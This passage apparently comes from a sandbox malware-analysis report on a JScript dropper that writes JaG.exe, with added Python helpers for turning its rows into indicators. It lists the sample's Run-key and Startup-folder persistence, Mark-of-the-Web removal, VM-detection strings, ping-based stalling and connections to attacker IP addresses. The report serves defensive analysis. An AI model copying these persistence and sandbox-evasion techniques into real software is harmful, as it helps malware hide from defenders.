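        cur = instances[-1] if instances else None
        if cur is None or cur["proc"] != proc or dll == cur["dlls"][0]:
            cur = {"proc": proc, "dlls": []}
            instances.append(cur)
        cur["dlls"].append(dll)
    return instances


def triage(instances: List[dict]) -> List[dict]:
    """Attach capability stacks and verdicts to each instance (verdict wording is an assumption)."""
    findings = []
    for inst in instances:
        loaded = set(inst["dlls"])
        stacks = sorted(name for name, dlls in STACKS.items() if loaded & dlls)
        exe = inst["proc"].rsplit("\\", 1)[-1].lower()
        verdicts = []
        if exe in SCRIPT_HOSTS and {"http", "sockets", "wmi"} & set(stacks):
            verdicts.append("script host with network/WMI capability")
        if "clr" in stacks and "amsi.dll" in loaded:
            # .NET Framework 4.8 hands assemblies loaded from memory to AMSI.
            verdicts.append("CLR process loaded amsi.dll (in-memory assembly load candidate)")
        if not inst["proc"].lower().startswith("c:\\windows\\"):
            verdicts.append("image outside C:\\Windows")
        findings.append({"proc": exe, "modules": len(inst["dlls"]), "stacks": stacks, "verdicts": verdicts})
    return findings


if __name__ == "__main__":
    for f in triage(split_instances(parse_rows(SAMPLE_ROWS))):
        print(f"{f['proc']:<12} {f['modules']:>3} modules  stacks={f['stacks']}  {f['verdicts']}")
```

On the constructed rows the two wscript.exe instances are the only ones that get the network/WMI verdict; the PING.EXE instances load mswsock.dll too but are not script hosts, which is why the check keys on the image name and not on the DLL alone.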

                            Data Obfuscation

                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\rHMh.js");
                            Source: Yara match | File source: 5.2.JaG.exe.4c30000.1.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.2.JaG.exe.38d1a10.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.2.JaG.exe.4c30000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.2.JaG.exe.38d1a10.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000005.00000002.2290405716.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000002.2287943742.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000002.2291109531.0000000004C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000002.2287943742.00000000027F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000002.2287943742.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: JaG.exe PID: 8168, type: MEMORYSTR
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_024F0152 push ebx; iretd 5_2_024F0153
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_024FD728 push eax; ret 5_2_024FD731
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F52DB0 push es; ret 5_2_07F52DA0
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F52D91 push es; ret 5_2_07F52DA0
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F5CBFF pushad ; ret 5_2_07F5CC03
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Code function: 5_2_07F52030 push esp; retf 5_2_07F52031
                            Source: JaG.exe.4.dr | Static PE information: section name: .text entropy: 6.903609935714846
                            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\JaG.exe

                            Boot Survival

                            Source: C:\Windows\System32\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobe (3 events)
                            Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg.exe (3 events)
                            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.js (dropped file; 3 events)

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | File opened: C:\Users\user\AppData\Local\Temp\JaG.exe\:Zone.Identifier read attributes | delete
                            Source: unknown | Network traffic detected: HTTP traffic on ports 49717, 49718, 49725-49735 and 49737-49762 -> 6892 (39 connections)
                            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (24 events)
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Process information set: NOOPENFILEERRORBOX (42 events; SetErrorMode(SEM_NOOPENFILEERRORBOX) is also set by many legitimate programs and is weak evidence on its own)
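The Boot Survival rows (Run values named adobe and audiodg.exe, adobe.js in the Startup folder) and the rows above (the Zone.Identifier stream of the dropped JaG.exe opened with delete access, HTTP to TCP/6892) are what a responder turns into host and network checks. The Python below is an added example, not Joe Sandbox code and not part of this report: it parses behaviour rows in the form used above (source process and description separated by " | ") into typed IOCs, groups them by tactic and lists the on-host artifacts to verify. The row strings are copied from the sections above; the regular expressions, the set of "standard" HTTP ports and the script-host and script-extension lists are this example's own assumptions.

```python
"""Turn Joe Sandbox behaviour rows into triage-ready IOCs.

Added example for this report page, not Joe Sandbox code. REPORT_ROWS is
copied from the report above; everything else (regexes, port set, script
host and extension lists) is an assumption of this example.
"""
import ntpath
import re
from collections import Counter

# Rows copied from the Boot Survival and Hooking sections of the report.
REPORT_ROWS = [
    r"C:\Windows\System32\wscript.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobe",
    r"C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg.exe",
    r"C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.js",
    r"C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\JaG.exe",
    r"C:\Users\user\AppData\Local\Temp\JaG.exe | File opened: C:\Users\user\AppData\Local\Temp\JaG.exe\:Zone.Identifier read attributes | delete",
    r"unknown | Network traffic detected: HTTP traffic on port 49717 -> 6892",
    r"unknown | Network traffic detected: HTTP traffic on port 49718 -> 6892",
]

# Assumptions of this example, not values taken from the report.
STANDARD_HTTP_PORTS = {80, 443, 8000, 8080, 8443}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1"}
STARTUP_MARKER = "\\start menu\\programs\\startup\\"

RUN_KEY_RE = re.compile(r"Registry value created or modified: (?P<key>HKEY_\S+\\Run(?:Once)?) (?P<value>\S+)$")
ZONE_ID_RE = re.compile(r"File opened: (?P<path>.+?)\\:Zone\.Identifier (?P<access>.+)$")
FILE_CREATED_RE = re.compile(r"File created: (?P<path>.+)$")
HTTP_PORT_RE = re.compile(r"HTTP traffic on port (?P<src>\d+) -> (?P<dst>\d+)$")


def parse_row(row):
    """Classify one 'source | description' row into a typed IOC dict."""
    # Split on the first separator only: the description itself may contain ' | '.
    source, _, detail = row.partition(" | ")
    m = RUN_KEY_RE.search(detail)
    if m:
        return {"type": "run_key", "source": source, "key": m["key"], "value_name": m["value"]}
    m = ZONE_ID_RE.search(detail)
    if m:
        return {"type": "motw_tamper", "source": source, "path": m["path"], "access": m["access"]}
    m = FILE_CREATED_RE.search(detail)
    if m:
        path = m["path"]
        kind = "startup_folder_drop" if STARTUP_MARKER in path.lower() else "file_drop"
        return {"type": kind, "source": source, "path": path}
    m = HTTP_PORT_RE.search(detail)
    if m:
        dst = int(m["dst"])
        kind = "http" if dst in STANDARD_HTTP_PORTS else "http_nonstandard_port"
        return {"type": kind, "source": source, "src_port": int(m["src"]), "dst_port": dst}
    return {"type": "other", "source": source, "detail": detail}


def triage(rows):
    """Group parsed rows by tactic; non-standard-port HTTP is aggregated per destination port."""
    findings = {"persistence": [], "defense_evasion": [], "network": []}
    port_hits = Counter()
    for row in rows:
        ioc = parse_row(row)
        writer = ntpath.basename(ioc["source"]).lower()
        if ioc["type"] == "run_key":
            host_note = " (script host)" if writer in SCRIPT_HOSTS else ""
            findings["persistence"].append(
                f"Run value '{ioc['value_name']}' under {ioc['key']} written by {writer}{host_note}")
        elif ioc["type"] == "startup_folder_drop":
            ext = ntpath.splitext(ioc["path"])[1].lower()
            what = "script" if ext in SCRIPT_EXTENSIONS else "file"
            findings["persistence"].append(f"{what} dropped to Startup folder: {ioc['path']}")
        elif ioc["type"] == "motw_tamper" and "delete" in ioc["access"]:
            findings["defense_evasion"].append(
                f"Zone.Identifier stream of {ioc['path']} opened with delete access (Mark-of-the-Web removal)")
        elif ioc["type"] == "http_nonstandard_port":
            port_hits[ioc["dst_port"]] += 1
    for port, count in sorted(port_hits.items()):
        findings["network"].append(f"HTTP on non-standard TCP/{port}: {count} connections")
    return findings


def host_artifacts(rows):
    """Return sorted (kind, location) pairs a responder should verify on a suspect host."""
    artifacts = set()
    for row in rows:
        ioc = parse_row(row)
        if ioc["type"] == "run_key":
            artifacts.add(("registry_value", ioc["key"] + "\\" + ioc["value_name"]))
        elif ioc["type"] in ("startup_folder_drop", "file_drop"):
            artifacts.add(("file", ioc["path"]))
    return sorted(artifacts)


if __name__ == "__main__":
    for tactic, items in triage(REPORT_ROWS).items():
        print(tactic, *("  - " + item for item in items), sep="\n")
    for kind, location in host_artifacts(REPORT_ROWS):
        print(f"check {kind}: {location}")
```

Two points to keep in mind when acting on the output: audiodg.exe is also the name of a legitimate Windows binary, so the Run value name alone proves nothing and the value data has to be inspected; and because the sample persists through both a Run value and a Startup folder script, deleting only one of the two leaves the infection in place.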

                            Malware Analysis System Evasion

                            Source: Yara match | File source: Process Memory Space: JaG.exe PID: 8168, type: MEMORYSTR
                            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk (2 events)
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Section loaded: OutputDebugStringW count: 271
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 65 (2 events)
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 72 (2 events; ping sends one echo request per second to the loopback address, so -n 65 and -n 72 stall the calling script for roughly 64 and 71 seconds without calling a sleep API)
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: 24F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: 26A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: 46A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: 56E0000 memory reserve | memory write watch (4 events)
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: 4F50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: 66E0000 memory reserve | memory write watch (4 events)
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: 76E0000 memory reserve | memory write watch (5 events)
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: 7930000 memory reserve | memory write watch (2 events)
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: 8930000 memory reserve | memory write watch (2 events)
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: 9930000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: A930000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: 86E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: 96E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 922337203685477 (Int64.MaxValue / 10000, i.e. TimeSpan.MaxValue in milliseconds: an effectively infinite wait)
                            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer (9 events)
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Window / User API: threadDelayed 8427
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Window / User API: threadDelayed 1355
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916 | Thread sleep time: -20291418481080494s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe TID: 7916 | Thread sleep time: -60000s >= -30000s, followed by 49 further sleeps shrinking in steps of roughly 110 down to -54578s (every one >= -30000s); the steadily decreasing values are consistent with a loop that re-sleeps for the time remaining until a fixed deadline rather than a single long sleep
                            Source: C:\Windows\SysWOW64\PING.EXE TID: 3292 | Thread sleep count: 63 > 30
                            Source: C:\Windows\SysWOW64\PING.EXE TID: 3292 | Thread sleep time: -63000s >= -30000s
                            Source: C:\Windows\SysWOW64\PING.EXE | Last function: Thread delayed (4 events)
                            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 60000
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 59890
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 59778
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 59672
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 59562
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 59453
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 59344
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 59219
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 59109
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 59000
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 58890
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 58779
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 58671
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 58562
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 58453
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 58344
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 58219
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 58109
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 58000
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 57890
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 57781
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 57672
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 57562
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 57451
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 57344
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 57234
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 57125
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 57016
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 56890
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 56781
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 56672
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 56562
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 56452
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Thread delayed: delay time: 56343
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 56234Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 56125Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 56015Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55906Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55797Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55687Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55577Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55469Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55344Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55234Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55125Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 55015Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 54906Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 54797Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 54685Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeThread delayed: delay time: 54578Jump to behavior
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: wscript.exe, 00000003.00000002.2596806001.000001E9CD3A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD3A6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW!~
Source: wscript.exe, 00000004.00000002.1376649836.000001A8A2802000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: JaG.exe, 00000005.00000002.2290405716.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, JaG.exe, 00000005.00000002.2291109531.0000000004C30000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: VBoxTray
Source: JaG.exe, 00000005.00000002.2291109531.0000000004C30000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
Source: wscript.exe, 00000001.00000003.1344575852.000002BF1373C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000001.00000002.1345634293.000002BF11564000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343866311.000002BF11564000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343333967.000002BF11564000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
Source: wscript.exe, 00000008.00000002.2596539768.000001F861C6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@s
Source: wscript.exe, 00000001.00000002.1346003747.000002BF13702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2596806001.000001E9CD34B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2596806001.000001E9CD3A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD3A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596539768.000001F861CDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000004.00000002.1376649836.000001A8A2802000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000001.00000003.1343333967.000002BF1153F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1345634293.000002BF11544000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1343866311.000002BF11544000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW~I
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Memory allocated: page read and write | page guard
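The long run of "Thread delayed" rows above is the raw evidence behind the report's "Tries to delay execution" verdict: JaG.exe sleeps in a loop, and each logged value is about 110 ms smaller than the one before it. The Python helper below is an added example, not part of the Joe Sandbox report or of the analysed sample. It parses rows in this format, checks whether the values form a strictly decreasing series with a near-constant step (the shape produced when one deadline is re-armed on every loop iteration and the remaining time is passed to each wait), and then reports the intended wait (the first value) and the wall-clock window actually covered (first minus last) instead of naively summing the values. Reading the values as remaining time rather than as independent sleeps is an assumption of this example; the five sample rows are copied from the report.

```python
import re
from typing import Any, Dict, List

# Matches a behaviour row whatever separator the report uses between cells.
DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")

# Constructed sample: the first five JaG.exe rows from this report, in the
# order the sandbox logged them (values copied from the report).
SAMPLE_ROWS = """\
Source: C:\\Users\\user\\AppData\\Local\\Temp\\JaG.exe | Thread delayed: delay time: 59778
Source: C:\\Users\\user\\AppData\\Local\\Temp\\JaG.exe | Thread delayed: delay time: 59672
Source: C:\\Users\\user\\AppData\\Local\\Temp\\JaG.exe | Thread delayed: delay time: 59562
Source: C:\\Users\\user\\AppData\\Local\\Temp\\JaG.exe | Thread delayed: delay time: 59453
Source: C:\\Users\\user\\AppData\\Local\\Temp\\JaG.exe | Thread delayed: delay time: 59344
"""


def parse_delays(report_text: str) -> List[int]:
    """Extract every delay value (milliseconds) in report order."""
    return [int(m.group(1)) for m in DELAY_RE.finditer(report_text)]


def analyze_delays(delays: List[int], jitter_ms: int = 50) -> Dict[str, Any]:
    """Characterise a delay series.

    A strictly decreasing series whose steps all lie within `jitter_ms` of the
    median step is treated as one countdown (assumption): the code re-arms a
    single deadline on every iteration, so the first value is the intended wait
    and first - last is the time actually spent in the loop so far. Summing the
    values would overcount by roughly the number of iterations in that case.
    """
    if len(delays) < 2:
        return {"count": len(delays), "countdown": False}
    steps = [a - b for a, b in zip(delays, delays[1:])]
    median = sorted(steps)[len(steps) // 2]
    countdown = all(s > 0 and abs(s - median) <= jitter_ms for s in steps)
    return {
        "count": len(delays),
        "countdown": countdown,
        "step_ms": median,
        "intended_ms": delays[0] if countdown else None,
        "elapsed_ms": delays[0] - delays[-1] if countdown else None,
        "naive_sum_ms": sum(delays),
    }


def verdict(report_text: str, stall_threshold_ms: int = 30_000) -> str:
    """'stalling-loop' when a countdown targets a wait of at least the threshold."""
    info = analyze_delays(parse_delays(report_text))
    if info.get("countdown") and info["intended_ms"] >= stall_threshold_ms:
        return "stalling-loop"
    return "inconclusive"


if __name__ == "__main__":
    print(analyze_delays(parse_delays(SAMPLE_ROWS)))
    print(verdict(SAMPLE_ROWS))
```

Run over the full 48 rows above, the countdown starts at 59778 ms and has reached 54578 ms when the log ends, so the loop had been running for about 5.2 s and was aiming for roughly a minute; the threshold in `verdict` is a tuning knob, not a value taken from the report.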

                            HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | File created: JaG.exe.4.dr
Source: C:\Windows\System32\wscript.exe | Network Connect: 172.245.208.13 80
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.168.7.12 6892
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rwinmgmts:\\localhost\root\securitycenter2pac/h
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".2
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".$
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\system tools\desktop.ini
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: common start menu
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :\adobe.js
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appdata\roaming
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local documents
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\infx
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32r
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appdata
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appdata@
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: roaming
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: roaming@
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1gzct
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: programs
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: programsj
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: programs@shell32.dll,-21782
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .appdata
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .roaming
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoftd
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .microsoft
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: windows
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: windows@
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .windows
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: libraries
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: librariesd
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .libraries
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21796
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-115
